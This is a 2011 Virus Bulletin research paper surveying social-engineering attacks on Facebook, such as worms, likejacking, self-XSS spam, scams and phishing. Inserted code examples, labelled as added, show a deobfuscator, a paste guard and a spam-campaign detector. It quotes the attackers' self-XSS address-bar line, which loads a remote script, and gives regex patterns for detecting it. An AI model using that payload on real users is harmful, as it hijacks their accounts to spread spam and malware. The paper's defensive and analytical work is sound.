A STUDY OF MALICIOUS ATTACKS ON FACEBOOK

Maria Patricia M. Revilla
Commtouch, Philippines

October 2011

Copyright is held by Virus Bulletin Ltd, but made available on this site for personal use free of charge by permission of Virus Bulletin (http://www.virusbtn.com).
VIRUS BULLETIN CONFERENCE OCTOBER 2011

Email Patriciar@commtouch.com

ABSTRACT

Social networking sites have, beyond doubt, made it into today’s popular culture. They have apparently become the primary resource for the masses when it comes to socializing for the sole reason that they generally measure up to what the modern populace claim to demand – something fast, easy and accessible. Facebook is a perfect example.

Facebook has become undeniably popular. With 600 million users to date, it could be considered to be the most widely used social networking site in the last decade. People patronize Facebook for its simple, but rather functional features, which range from public messaging through wall posts and private messaging, to sharing photos, videos and URL links, to gaming, and even marketing and advertisements. It even makes a good online outlet for thoughts in the form of ‘status updates’ which can be changed as often as one wishes.

With its popularity and effectiveness, Facebook has also become a hot spot for attackers. Over the years, social engineering has been reported to effectively spread malicious programs which are hard to prevent, especially granted that they are designed to trick human thinking.

This paper will seek to study the social engineering attacks that have been identified to spread malware through Facebook. By tracking down the distribution methods/mechanisms for spreading malware, and the current preventive and defensive measures, this paper aims to give an insight into the challenges that are being faced in terms of protecting users.

INTRODUCTION

Facebook has become enormously popular, reaching over 600 million users to date [1]. Users have increasingly integrated social networks into their lives, spending a reported 700 billion minutes per month on Facebook [2]. Every 20 minutes approximately 24,857,000 actions are performed which may be broken down into:

    10,208,000    comments made
     2,716,000    photos uploaded
     2,716,000    messages sent
     1,972,000    friend requests accepted
     1,851,000    status updates
     1,587,000    wall posts
     1,484,000    event invites
     1,323,000    tagged photos
     1,000,000    links shared

Table 1: Facebook activity statistics (onlineschools.org [3]).

The popularity, number of subscribers, and level of activity have made Facebook an attractive tool for attackers who use social engineering in order to spread malicious content or earn money unethically. Over the years, social engineering has been enormously effective as it succeeds in convincing users to unknowingly act in the interests of cybercriminals. Spam and email scams have been used to deceive users, for example, offering seemingly legitimate employment, while putting victims to work as money mules who unwittingly help launder stolen funds. It has also been used as a tool to start and force the spread of worms by including attachments disguised as normal documents.

The use of fake file icons such as those used for Windows folders, Word documents, text files, media files and others is a subtle form of social engineering, letting users think that a malicious application is just a normal document. Instant messages on Yahoo! or MSN use convincing phrases promising must-see pictures or videos to trick users into clicking malicious links that may point to phishing sites or rogue software. Rogue software or fake anti-virus products are themselves a form of social engineering. By scaring users with ‘detected’ malware, they convince them to pay for products that they believe will actually help them remove the ‘infection’. Sophisticated social engineering attacks use emotion and human desires to trick users. Protecting users from themselves is a tough job and it is something that a computer cannot really do.

In 2008, the Koobface worm spread through social networks, including Facebook (where its name came from). It may be considered to be one of the most successful worms as new variants are still being encountered – over 20,000 variants [4] by April 2011. Aside from the Koobface worm, there have been other forms of attacks – clickjacking, phishing, spam, scam messages, links to rogue applications, and others that help cybercriminals earn money. It is certainly alarming to see how these forms of attack have increased.

Based on the number of active users and activities performed by Facebook users, it is clear that Facebook has become an effective social networking site with people benefiting from its integrated functionality such as photos and messaging. At the same time, attackers have successfully taken advantage of this functionality to turn Facebook into a channel for spreading malicious content. Even a small percentage of compromised users would equal a large attack base given the number of active users on the site.

Security companies have developed tools and have improved scanners to detect and prevent intrusion of malicious programs. Solutions range from single file detection to generic and heuristic detections, and even cloud-based technologies. As these protection technologies have improved, attacks have grown more sophisticated in an attempt to evade new and existing security measures. Attackers usually take advantage of commonly used software and/or popular sites combining social engineering with exploits of vulnerabilities in programs like Adobe Reader or Internet Explorer. Our observation is that attackers have achieved the most success in bypassing security measures by employing sophisticated social engineering methods.

This paper will focus on analysing social engineering attacks on Facebook and will try to present the preventive measures the industry has provided to users, defensive measures/tools that are available for users, and the challenges faced in preventing users from becoming victims.
THE PROBLEM – FACEBOOK SOCIAL ENGINEERING ATTACKS

A trusting user in a social network environment wouldn’t suspect that a friend (deliberately added to a friend list) would send any harmful content. This trust turns a very popular and widely used social networking site like Facebook into a huge opportunity for attackers. Users are drawn to action by ‘friends’ – following a message, links, or an invite – without suspecting that this will undermine security.

Worms: Koobface and Palevo

The Koobface worm has been around since 2008 [5]. It was first encountered through Facebook messages that enticed a user to view a video from a link that looked as though it came from YouTube. Alluring messages like, ‘You must see it!!!...’, were the first step of its social engineering tactic. Users who clicked on the link were prompted to download newer versions of Adobe Flash Player – the second part of the social engineering attack. The downloaded file ‘codecsetup.exe’ was actually not an Adobe Flash Player, but a malicious executable. Once the executable was installed, the infected machine turned into a bot used for spreading more messages with malicious links and for other malicious purposes.

Later, when users became aware of a worm that spread using a fake YouTube-like video, a new variant was encountered which used a Blogspot link sent through messages of friends [6]. The message had the same video-related theme, but the changed destination to a Blogspot link reduced the suspicion. The Blogspot pages included JavaScript redirects to pages again requiring the installation of a so-called video playing component (as with the initial version). As before, the ‘video playing component’ was in fact a malicious executable. In this case, the infected machine opened new Blogspot accounts and distributed the malicious links to friends. Figures 1 and 2 show some examples.

Figure 1: Blogspot post example (1).

Figure 2: Blogspot post example (2).

Palevo is another worm that has been known to spread through social network chat messages or instant messages including Facebook [7]. This worm has exploited Facebook chat and Facebook application functionality. It tried to spread by sending chat messages to friends and disguised itself as a photo album application. Following the link to the fake application, the user was prompted to download the file ‘FacebookPhotos#####.exe’, which is the malicious executable. Newer variants used different filenames such as ‘Facebook-pic[number].exe’ (e.g. Facebook-pic000751357.exe) [8].

Clickjacking

Another type of social engineering attack is clickjacking. This method tricks a user into allowing a malicious script or code to execute without his knowledge by enticing the user to click on seemingly normal objects on a web page, such as buttons, links, or images. On the Facebook platform, attackers were able to find ways to exploit some of its functionalities such as the ‘Like’, ‘Publish’, and ‘Comments’ buttons when writing comments on photos, videos or links.

A worm that spread on Facebook through a clickjack attack was successfully executed using an invisible IFrame. It basically exploited the ‘Publish’ button that posts a link to the user’s wall. The link points to a page that contains an invisible IFrame shown in the code in Figure 3 (from jsunpack.jeek.org). The user is unaware that a click anywhere on the page is actually a click on the ‘Publish’ button. This results in a post on the victim’s wall, which will then be seen by the victim’s friends, probably causing them to click as well, and in this way continuing the spread of the malware. This worm was first reported by F-Secure in May 2010 [9].

Figure 3: Clickjack sample using IFrame tag (1).

Following this attack, a lot of other clickjack attacks followed by exploiting the famous ‘Like’ button, also known as a ‘likejacking’ attack. When a user ‘likes’ a certain page, video, photo or a website on Facebook, it enables the user to share this content with friends. It’s almost the same as suggesting it to friends as the liked page appears on the user’s newsfeed causing friends to see it and probably to click it themselves. This attack works especially well when the link has a descriptive text specially crafted to attract users, such as messages promising a ‘video of Justin Bieber’, or ‘pics of Miley Cyrus’, or any current newsworthy event [10]. An example of the actual code used for this attack is shown in Figure 4 (from pastebin.com).

Figure 4: Clickjack sample using IFrame tag (2).

The code basically uses the same method as an invisible IFrame which follows the user’s mouse. Any click on the page will be a click on the ‘Like’ button, without the user’s knowledge.

Another attack exploited the ‘Comment’ functionality. Once a user ‘comments’ on a photo, a video or a link on Facebook, it will appear on the user’s wall or newsfeed, causing friends to see it and, as before, probably attracting them to see and click on it as well. Here again, the messages included text with famous names such as Justin Bieber. Clicking on the link led to a page with a question and text entry box for the answer. The text box was actually a Facebook comment box which would result in the posting of a comment on the victim’s wall, or a message on the victim’s newsfeed, causing it to be shared and seen by the user’s friends. This attack was reported by Sophos in April 2011 [11].

Scam and spam messages on Facebook

Facebook has also become the target of scammers and spammers. Unethical and illegal advertisers have predictably

taken advantage of the large number of Facebook users. One method of scam and spam has spread on Facebook through a manual cross-site scripting (XSS) attack (also called a self-XSS attack). The concept of an XSS attack is not new, but the interesting thing here is the social engineering used that convinces the user to manually enter the malicious script in the browser address bar. The topics were varied [12, 13]:

  • Promises of 500 free Facebook credits (something that does not exist)
  • An application to see who had been viewing a user profile
  • Video of Osama Bin Laden’s assassination.

These all led to pages with instructions such as these:

    Just follow these 3 steps:
    1. Copy this code (highlight and press CTRL-C):
    javascript:(a=(b=document).createElement(‘script’)).src=’//[omitted]/f.js’,b.body.appendChild(a);void(0)
    2. Delete the actual address from the url field in your browser and paste the code instead.
    3. Press Enter and wait for a bit, it can take up to a minute to complete.
    That’s it!
    If you are having trouble with these instructions, try viewing the instructions here: http://[omitted].info/?sg2lq
    it’s where I learned it

Attackers even provided step by step image guides showing how to perform the self-XSS attack, as shown in Figures 5 and 6.

Figure 5: Self-XSS instruction to users (1).

Figure 6: Self-XSS instruction to users (2).

It is quite remarkable that there are users who fall for scams which require them to manually copy and paste code into their browser’s address bar. Once the code has been pasted as per the instructions, the user is redirected to a ‘survey page’. This is an affiliate link where rogue affiliates earn money for bringing users to partner sites. At the end of the survey page, a user ends up viewing ads that are not really related to the subject of the link that they originally clicked. Most of these focus on methods to earn easy money, earn points/credits, view gossip or the latest news and events, and others.

Having hijacked the user’s Facebook session, the script also sends the scam messages through almost all means of reaching out to a victim’s friends including: chat, wall posts, status updates, event invitations and private messages. It also makes use of shortened URLs in order to avoid immediate suspicion from users.

Figure 7 shows an example of a fake event invitation. Notice that the subject is ‘Official App: See Who has Viewed your Profile? Find out here! [bad shortened link]’. Many users will notice that this doesn’t really sound like an ‘event’, but the idea is to catch the user’s attention and draw them into following the link.

Figure 7: Fake Facebook event invitation.

An example of spam code shown in Figure 8 illustrates how the messages continue to spread widely. The code uses an obfuscation technique to hide the routine using encoded function calls stored in an array of variables – in this sample, var _0xb65. Looking at the rest of the code gives us a clue as to its real purpose since it uses the XMLHttpRequest API, which is used for sending HTTP or HTTPS requests directly to a web server.

Decoding the variable _0xb65 reveals what the routine is all about (Figure 9).

Basically, once the script is executed, messages will be sent to the victim’s friends with texts based on the variable settings in the code as shown in the additional code below. Aside from posting a message the script will also make a comment on the posted message and will also ‘like’ the post it created (Figure 10).

Figure 11 shows how the resulting post, comment and message will look.
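The decoding step described above can be done statically, without ever running the script. The following is an added example, not the code from the paper's figures: the sample input is constructed (only the _0xb65 name follows the paper; the endpoint and request body are placeholders) and the function names are illustrative.

```javascript
'use strict';

// Constructed sample, not the code from the paper's figures: literals are
// hex-escaped, parked in an array and referenced by index. The endpoint and
// request body are harmless placeholders.
const SAMPLE = String.raw`var _0xb65=["\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x6F\x70\x65\x6E","\x50\x4F\x53\x54","\x2F\x70\x6C\x61\x63\x65\x68\x6F\x6C\x64\x65\x72","\x73\x65\x6E\x64","\x6D\x73\x67\x3D\x68\x69"];
var r=new window[_0xb65[0]]();
r[_0xb65[1]](_0xb65[2],_0xb65[0x3],true);
r[_0xb65[4]](_0xb65[5]);`;

const SIMPLE_ESCAPES = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v', 0: '\0' };
// Matches `var _0x... = [ ... ];`. Assumes no raw "]" inside the entries,
// which holds when every character is escaped as in this style of packing.
const DECL = /\bvar\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]\s*;?/g;
const LITERAL = /"((?:[^"\\]|\\[\s\S])*)"|'((?:[^'\\]|\\[\s\S])*)'/g;

// Decode the body of a JavaScript string literal without evaluating it.
function decodeLiteral(body) {
  return body.replace(/\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4})|([\s\S]))/g,
    (match, hex, uni, ch) => {
      if (hex) return String.fromCharCode(parseInt(hex, 16));
      if (uni) return String.fromCharCode(parseInt(uni, 16));
      return Object.prototype.hasOwnProperty.call(SIMPLE_ESCAPES, ch)
        ? SIMPLE_ESCAPES[ch] : ch;
    });
}

// Collect every string table and decode its entries.
function extractStringTables(src) {
  const tables = new Map();
  for (const decl of src.matchAll(DECL)) {
    const entries = [];
    for (const lit of decl[2].matchAll(LITERAL)) {
      entries.push(decodeLiteral(lit[1] !== undefined ? lit[1] : lit[2]));
    }
    tables.set(decl[1], entries);
  }
  return tables;
}

// Replace table lookups with the decoded literal, then turn obj["name"] into
// obj.name so the call sequence can be read directly.
function deobfuscate(src) {
  const tables = extractStringTables(src);
  let code = src.replace(DECL, '');
  for (const [name, entries] of tables) {
    const ref = new RegExp('\\b' + name + '\\[\\s*(0x[0-9a-fA-F]+|\\d+)\\s*\\]', 'g');
    code = code.replace(ref, (match, index) => {
      const value = entries[Number(index)];   // Number() accepts "3" and "0x3"
      return value === undefined ? match : JSON.stringify(value);
    });
  }
  code = code.replace(/\[\s*"([A-Za-z_$][\w$]*)"\s*\]/g, '.$1').trim();
  return { tables, code };
}

// Decoded strings that name a request API: the same clue the paper takes
// from the script's use of XMLHttpRequest.
function requestIndicators(tables) {
  const hits = [];
  for (const [name, entries] of tables) {
    entries.forEach((value, index) => {
      if (/^(XMLHttpRequest|ActiveXObject|fetch|sendBeacon)$/.test(value)) {
        hits.push(`${name}[${index}] = ${value}`);
      }
    });
  }
  return hits;
}

const result = deobfuscate(SAMPLE);
console.log(result.code);
console.log(requestIndicators(result.tables));
```

Because nothing is evaluated, the same functions can be pointed at a captured script on an analysis workstation without risk of it sending anything.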




Figure 8: JavaScript spam code (1).

Figure 9: JavaScript spam code (2).

Figure 10: JavaScript spam code (3).
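As an added example (not part of the original paper), here is one way a paste guard could recognise the address-bar instructions quoted in this section: it normalises the pasted text the way a URL parser would, strips any javascript: prefix, and reports what the remaining payload does. inspectPaste and the rule labels are illustrative names, and every input other than the snippet quoted in the paper is constructed.

```javascript
'use strict';

// The address-bar snippet quoted in the paper. The host is "[omitted]" there;
// \u2018 and \u2019 are the typographic quotes as printed.
const PAPER_SNIPPET =
  'javascript:(a=(b=document).createElement(\u2018script\u2019)).' +
  'src=\u2019//[omitted]/f.js\u2019,b.body.appendChild(a);void(0)';

// Constructed inputs for comparison.
const SAMPLES = {
  paper: PAPER_SNIPPET,
  mixedCase: '  JaVa\tScRiPt:void(0)',
  doubled: 'javascript: javascript:void(0)',
  ordinaryLink: 'https://www.facebook.com/',
};

const SCHEME = /^javascript:/i;

// What the payload does once the scheme has been recognised. Quotes may be
// straight or typographic, since copied instructions often carry the latter.
const PAYLOAD_SIGNS = [
  ['creates a script element',
    /createElement\s*\(\s*['"\u2018\u2019]script['"\u2018\u2019]\s*\)/i],
  ['sets a script source', /\.\s*src\s*=/i],
  ['pulls code from another host',
    /['"\u2018\u2019](?:https?:)?\/\/[^'"\u2018\u2019\s]+\.js\b/i],
  ['injects a node into the page', /\.\s*appendChild\s*\(/i],
];

// URL parsers drop tab, CR and LF anywhere in the input and ignore leading
// control characters and spaces, so the scheme check must run on that form.
function normalise(text) {
  return text.replace(/[\t\n\r]/g, '').replace(/^[\u0000-\u0020]+/, '');
}

function inspectPaste(text) {
  let rest = normalise(text);
  let stripped = 0;
  while (SCHEME.test(rest)) {            // also handles a doubled prefix
    rest = normalise(rest.replace(SCHEME, ''));
    stripped += 1;
  }
  if (stripped === 0) return { blocked: false, reasons: [], safeText: text };

  const reasons = ['javascript: scheme'];
  for (const [label, pattern] of PAYLOAD_SIGNS) {
    if (pattern.test(rest)) reasons.push(label);
  }
  // safeText is what would be left in the address bar: inert text, no scheme.
  return { blocked: true, reasons, safeText: rest };
}

function inspectAll(samples) {
  const report = {};
  for (const [name, text] of Object.entries(samples)) {
    report[name] = inspectPaste(text);
  }
  return report;
}

console.log(JSON.stringify(inspectAll(SAMPLES), null, 2));
```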


Figure 11: Resulting post made by the spam code.

Money-mule and credit card scams

Money-mule scams have also made their way into Facebook. As with other platforms, scammers attract people with promises of easy money. Money-mule recruitment usually starts with Facebook groups (which can be started by any Facebook user). These groups often attract large followings because people do not know what they are getting into [14].

Other frauds have also appeared, such as credit card scams. These start with messages designed to attract users by proposing ‘money-making jobs’, or books about ‘how to earn big money’, ‘how to win the Lotto’, or ‘guides on how to be attractive’. The example in Figures 12 and 13 shows the first part of such an attack using an ‘easy money making’ Facebook group. Some of the posts on the group’s wall are products being sold, relating to books for winning the Lotto or attracting women (Figures 14 and 15).

Figure 12: Scam group page sample (1).

Figure 13: Scam group page sample (2).

Figure 14: Scam post sample (1).

Figure 15: Scam post sample (2).

Following the links leads to the sites shown in Figures 16 and 17, enticing users by promising results as well as a discount when they buy the product.

Figure 16: Scam post advertisement sample (1).

Figure 17: Scam post advertisement sample (2).

Once a user accepts the offer, the payment is made via a credit card transaction as shown in Figures 18 and 19.

Figure 18: Payment scam sample (1).

Figure 19: Payment scam sample (2).



The site ‘complaintsboard.com’ shows that the site seems to be a fraud or a scam (Figure 20).

Figure 20: Complaintsboard complaint comments.

Fake email notifications – more scam, spam and malware attachments

Spammers promoting pharmaceutical products have also used Facebook as an opportunity. Fake Facebook email notifications trick users into clicking links leading to online pharmacy sites [15]. An example of a fake email notification is shown in Figure 21.

Figure 21: Fake Facebook email notification leading to online pharmacy site.

Following the link leads to the pharmaceutical store page shown in Figure 22.

Figure 22: Pharmaceutical store page.

Lottery scams have also been very common, using fake email notifications describing surprise lottery wins such as the ‘Facebook Africa Jackpot Promo’ shown in Figure 23 [16].

Figure 23: Facebook lottery email scam.

Figure 24: Fake Facebook email password notification (1).

Figure 25: Fake Facebook email password notification (2).

Figure 26: Fake Facebook email password notification (3).



The email has all the signs of an advance fee fraud scam, promising a huge sum of money, requesting detailed personal information, and requiring secrecy.

Malware writers have also taken advantage of fake Facebook email notifications. Emails include subjects relating to: ‘Facebook Abuse Department’, ‘Facebook Security’, and others (Figure 24).

In the examples shown in Figures 25 and 26, variants of the malware detected as Oficla (aka Bredolab) are sent as attachments with the email describing a password reset due to spam. Subjects include, ‘Spam from your account’.

The attachment names include: ‘Attached_SecurityCode.exe’, ‘Facebook_DOCUMENT.EXE’ and ‘Facebook_PASSWORD.EXE’. These are all malware executables that use misleading file icons in addition to their misleading file names. The use of trusted icons is a common social engineering tactic to trick a user into executing the malware file. Below are examples of the Oficla executables with misleading filenames and icons:

Figure 27: Oficla attachment file (1).

Figure 28: Oficla attachment file (2).

Phishing

Genuine Facebook user accounts are very valuable for cybercriminals since they provide them with access to a trusting network of friends. Facebook users have therefore become a natural target for phishers. Many fake pages have been launched (fed from fake email notifications) in order to steal users’ login information. Cybercriminals can then use these stolen accounts for many of the malicious purposes described in this paper. Attackers have become skilled at mimicking the actual Facebook login page, as in the example shown in Figure 29 [17].

Figure 29: Facebook phishing page sample.

According to PhishTank.com statistics [18], Facebook has consistently been in the top 10 sites targeted by phishing. From September 2009 until March 2011, 11,211 counts of phishing attempts were recorded (Figure 30).

Figure 30: Facebook phishing sites statistics.

Fake applications

Many Facebook users enjoy Facebook applications and games that exist within the social network such as FarmVille and CityVille, and attackers have also taken advantage of this functionality. The problem with applications on Facebook is that they have the ability to access some or all of the user’s profile information. Rogue applications can therefore post messages on a friend’s wall, send messages, and even extract information from user profiles to be used for any malicious purpose. Attackers usually use catchy subjects such as: ‘who viewed your profile’. A further issue is that the verification process for application writers is relatively simple.

PREVENTIVE MEASURES

Prevention is always better than cure. The trusted network nature of Facebook has made some cybercrime much easier. On the other hand, Facebook has improved its security measures and settings to protect its users. These measures have included partnerships with security organizations to help improve the site’s security tools. Although these systems are not perfect, they are worth noting as they do contribute to user security.

Spam, scam and clickjack prevention systems

Facebook has implemented security checks in order to protect users from phishing attacks. In the example below it was able to detect an attempt to log in from a page outside Facebook. When a user tries to visit a page that does not belong to Facebook, but requires a login to Facebook, the warning message below appears:

Figure 31: Security notice from a login attempt outside Facebook.



In the example in Figure 32, the mechanisms were also able to detect a suspicious phishing site that used a shortened URL. An example of a warning message is shown.

Figure 32: Facebook suspicious link warning.

In some cases, Facebook security tools are able to check and prevent spammers and scammers from creating fake user accounts. Examples of some of these security checks are shown below:

Figure 33: Account security check (1).

Figure 34: Account security check (2).

Figure 35: Account security check (3).

CAPTCHA verifications are designed to prevent automation of account creation by non-humans. When this CAPTCHA verification pops up, a user can optionally verify an account in order to avoid CAPTCHA verifications in the future. This verification requires a phone number. These checks are helpful, but they open the issue of user privacy and sharing of sensitive information. Security check messages may also pop up in some cases of clicking the ‘Like’ button of certain group pages.

Facebook has automated the detection of suspicious ‘like’ behaviour, which can prevent a clickjacking attack. This is good on some level; however, where the behavioural pattern of a clickjacking attack changes, chances are that new attacks might slip through [19].

Facebook has also automated detection and blocking of suspicious content, including giving warnings why certain content has been blocked. Using information from user reports and common patterns of spam and scam behaviour, they have been able to prevent users from opening and accessing malicious content [20]. However, spam writers continually try to evade spam detection systems. For instance, one script included the following code:

Figure 36: JavaScript spam code.

A common indicator of a spammer account is of course the large number of messages sent. In the code above, the variable nfriends is actually the number of friends the spam and scam messages will be sent to. Although it seems strange that messages are sent to only 15 of the victim’s friends (as opposed to all the victim’s friends), this is one way of trying to avoid detection based on the volume of sent messages. In addition, in order to avoid detection based on message content, the encoding of some characters of the words inside the message body has been altered.

Facebook apps

As described above, malicious apps have access to the user’s profile information and can take control of some actions such as posting on walls. As of this writing, an app creator must first verify an account by supplying a phone number or credit card number. The image below shows the verification pop-up window:

Figure 37: Facebook verification on application creation.

This is helpful to a degree. After supplying the information, an application can be created for the Facebook platform. The problem here is that, after the account has been verified, the developer can instantly publish any application without going through some approval from the Facebook team. Therefore, any malware writer can write an application on the platform and publish it without going through any security check.

Facebook security settings

Facebook has enabled secure browsing by implementing HTTPS on its platform. This adds protection and prevents hackers from being able to steal identity information while it is in transit – especially when a user logs in from a public place such as a coffee shop or library. However, this security option is not enabled by default.
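The evasion described earlier for the script in Figure 36 (only 15 recipients per account, altered character encoding in the body) defeats per-account volume rules and exact-match content rules. The following Python is an added example, not code from the paper or from Facebook: it canonicalizes message bodies and aggregates across accounts. It assumes the alterations are HTML entities, percent-encoding, Unicode compatibility forms or zero-width characters; the thresholds, account names and messages are constructed.

```python
import hashlib
import html
import re
import unicodedata
from collections import defaultdict
from urllib.parse import unquote

# Characters that render as nothing but break up words for naive matchers.
_INVISIBLE = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff\u00ad"))


def canonicalize(body):
    """Reduce encoded variants of a message to one comparable form."""
    text = html.unescape(body)                   # "&#101;" -> "e"
    text = unquote(text)                         # "%61"    -> "a"
    text = unicodedata.normalize("NFKC", text)   # fullwidth letters -> ASCII
    text = text.translate(_INVISIBLE)            # drop zero-width characters
    return re.sub(r"\s+", " ", text.casefold()).strip()


def fingerprint(body):
    """Short stable identifier for the canonical form of a message body."""
    return hashlib.sha256(canonicalize(body).encode("utf-8")).hexdigest()[:16]


def senders_over_limit(events, limit):
    """Per-account volume rule: accounts that messaged more than `limit` people."""
    recipients = defaultdict(set)
    for sender, recipient, _body in events:
        recipients[sender].add(recipient)
    return sorted(s for s, r in recipients.items() if len(r) > limit)


def find_campaigns(events, min_senders=3, min_total=40):
    """Group by canonical content across accounts and flag wide, shallow fan-out.

    events: iterable of (sender, recipient, body) tuples.
    Thresholds are illustrative assumptions, not values from the paper.
    """
    by_fp = defaultdict(lambda: defaultdict(set))  # fingerprint -> sender -> recipients
    text_for = {}
    for sender, recipient, body in events:
        fp = fingerprint(body)
        by_fp[fp][sender].add(recipient)
        text_for.setdefault(fp, canonicalize(body))

    findings = []
    for fp, by_sender in by_fp.items():
        total = sum(len(r) for r in by_sender.values())
        if len(by_sender) >= min_senders and total >= min_total:
            findings.append({
                "fingerprint": fp,
                "text": text_for[fp],
                "senders": sorted(by_sender),
                "total_recipients": total,
                "max_per_sender": max(len(r) for r in by_sender.values()),
            })
    return findings


def build_sample_events():
    """Constructed data: three accounts each message 15 friends with the same
    text encoded differently; a fourth account sends an ordinary message."""
    variants = {
        "acct_a": "Fr&#101;e gift c%61rd, click here",                 # entity + percent
        "acct_b": "\uff26\uff52\uff45\uff45 gift card, click here",    # fullwidth "Free"
        "acct_c": "Free gi\u200bft card,  CLICK here",                 # zero-width space
    }
    events = [(sender, f"{sender}_friend{i}", body)
              for sender, body in variants.items() for i in range(15)]
    events += [("acct_d", f"acct_d_friend{i}", "Lunch on Friday?") for i in range(3)]
    return events


if __name__ == "__main__":
    sample = build_sample_events()
    print("over per-account limit of 20:", senders_over_limit(sample, 20))
    for finding in find_campaigns(sample):
        print(finding)
```

No account in the sample exceeds a per-account limit of 20 and the three raw bodies differ byte for byte, yet the aggregate view reports one campaign reaching 45 recipients.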





Figure 38: Facebook HTTPS browsing setting.

Another security tool is the Facebook activity monitor that enables remote logout. A user can see the latest activities in his account by checking the Account Settings which include an indication that the account is active through a different location or device. The screen below shows a single account signed in on different computers. The user may end any active login from a different computer or location that he is not aware of. This is helpful in tracking if someone else is using an account.

Figure 39: Facebook activity monitor.

Facebook security and safety page

Educating users about Internet safety is another important preventive measure – particularly since most of the attacks rely on social engineering. The Facebook security page provides:
  • Information such as how to protect a user account, and how to take action when an account has been compromised and used for sending scams or spam.
  • Information about the threats that a user may encounter on Facebook and helpful tips to avoid scams, spams, hacks and malware that may be spreading on the platform.
  • A way of reporting a possible security vulnerability allowing Facebook to work on improving security measures.
  • A safety page that explains Facebook as a community in which everyone has a shared responsibility of keeping it as a safe environment. This gives an insight for parents, teens and teachers who are using Facebook and helps them understand the environment as well.

Security blogs

There continue to be numerous blog posts written about Facebook threats. Commtouch’s security blog and those of other anti-virus companies can enlighten customers about new threats that are found on the social network. Many of these blogs are very illustrative and informative, allowing users to easily understand, and be aware of the types of threats they might encounter on Facebook. These also provide tips on strengthening security and account settings.

DEFENSIVE MEASURES

Facebook generally blocks known malicious content or pages that are reported to it. Facebook reporting tools include links such as ‘Mark as Spam’ and ‘Report/Block this Person’.

Another defence available to end-users is a locally installed security product, such as URL and spam filtering software, and an anti-virus product. Anti-virus firms have also responded to the new threats by ensuring detection of new variants of Facebook worms, Oficla, and the increasing number of malicious scripts used for spamming. At the same time, security groups have created their own Facebook pages for users to view the latest threats including advice about how to remain secure and protected. Several companies have also released software specifically for Facebook.

CONCLUSION

As it has gained in popularity, Facebook has also been increasingly used for malicious purposes, and its name, functionalities and features have been vastly exploited. The security industry is continually working to keep pace with new cybercriminal tricks on Facebook. In addition, Facebook has taken several steps to protect its users while working with security groups in order to improve its defence systems and the security tools on the platform.

As shown by the many examples above, attackers employ numerous social engineering tactics to help spread malware, scams and spam. Indeed, the key security problem with Facebook lies in the trusted nature of friend connections which are so easy to exploit with social engineering. Education of users is therefore a key part of enhancing Facebook security.

ACKNOWLEDGEMENTS

I would like to express my sincere gratitude to Commtouch VirusLab and to the hands of the people that God used to make the completion of this paper possible: Robert Sandilands, Rommel Ramos, Avi Turiel, Rebecca Herson, Catherine Lor and Jinky Suarez. And whatsoever ye do, do it heartily, as to the Lord, and not unto men; – Colossians 3:23.

REFERENCES

[1] http://www.socialbakers.com/Facebook-statistics/?interval=last-week#chart-intervals.
[2] http://www.Facebook.com/press/info.php?statistics.
[3] http://www.onlineschools.org/blog/Facebook-obsession/.
[4] http://blog.Facebook.com/blog.php?post=68886667130.
[5] http://www.kaspersky.com/news?id=207575670.
[6] Commtouch Trend Report 2010 Q4. http://www.commtouch.com/download/1934.





[7] http://blog.commtouch.com/cafe/malware/malware-spread-via-Facebook-chat/.
[8] http://nakedsecurity.sophos.com/2011/01/09/Facebook-photo-album-chat-messages-spreading-koobface-worm/.
[9] http://www.f-secure.com/weblog/archives/00001955.html.
[10] http://athansj.blogspot.com/2011/03/Facebook-likejacking-attack.html.
[11] http://nakedsecurity.sophos.com/2011/04/30/Facebook-comment-jacking-omg-i-cant-believe-justin-bieber-did-this-to-a-girl/.
[12] http://blog.commtouch.com/cafe/malware/500-free-credits-from-Facebook-%E2%80%93-malware/#disqus_thread.
[13] http://blog.commtouch.com/cafe/malware/%E2%80%9Cosama-bin-laden-dead-%E2%80%93-actual-video%E2%80%9D-new-Facebook-malware/.
[14] http://www.thenewnewinternet.com/2010/06/01/Facebook-used-to-find-money-mules/.
[15] http://blog.commtouch.com/cafe/spam-favorites/spammers-vote-Facebook-%E2%80%93-%E2%80%9Capplication-of-the-year%E2%80%9D/.
[16] http://blog.commtouch.com/cafe/anti-scam/harry-potters-magic-money-foundation-and-more/.
[17] http://blog.commtouch.com/cafe/phishing/avoiding-Facebook-phishing/.
[18] http://www.phishtank.com/stats.php.
[19] http://nakedsecurity.sophos.com/2011/03/30/Facebook-adds-speed-bump-to-slow-down-likejackers/.
[20] http://blog.Facebook.com/blog.php?post=403200567130 (spam prevention systems).
[21] http://www.securelist.com/en/blog/208187962/Facebook_money_mule_or_credit_card.
[22] http://en.wikipedia.org/wiki/Clickjacking.
[23] http://www.personalizemedia.com/the-count/.
[24] http://www.Facebook.com/security.
[25] http://www.Facebook.com/blog.php?post=486790652130.
[26] http://blog.Facebook.com/blog.php?post=436800707130.
[27] http://blog.Facebook.com/blog.php?post=389991097130.




Bullyspoiler: Detect and Block Cyberbullying Tweet and Bully using Deep Learn...Bullyspoiler: Detect and Block Cyberbullying Tweet and Bully using Deep Learn...
Bullyspoiler: Detect and Block Cyberbullying Tweet and Bully using Deep Learn...
 

Plus de Cyren, Inc

Webinar: Why evasive zero day attacks are killing traditional sandboxing
Webinar: Why evasive zero day attacks are killing traditional sandboxingWebinar: Why evasive zero day attacks are killing traditional sandboxing
Webinar: Why evasive zero day attacks are killing traditional sandboxingCyren, Inc
 
Webinar: Botnets - The clone army of cybercrime
Webinar: Botnets - The clone army of cybercrimeWebinar: Botnets - The clone army of cybercrime
Webinar: Botnets - The clone army of cybercrimeCyren, Inc
 
Webinar: Cloud-Based Web Security as First/Last Line of Defense
Webinar: Cloud-Based Web Security as First/Last Line of DefenseWebinar: Cloud-Based Web Security as First/Last Line of Defense
Webinar: Cloud-Based Web Security as First/Last Line of DefenseCyren, Inc
 
Webinar: Insights from CYREN's 2015-Q3 Cyber Threat Report
Webinar: Insights from CYREN's 2015-Q3 Cyber Threat ReportWebinar: Insights from CYREN's 2015-Q3 Cyber Threat Report
Webinar: Insights from CYREN's 2015-Q3 Cyber Threat ReportCyren, Inc
 
Webinar: Dispelling the Myths about Cloud Security
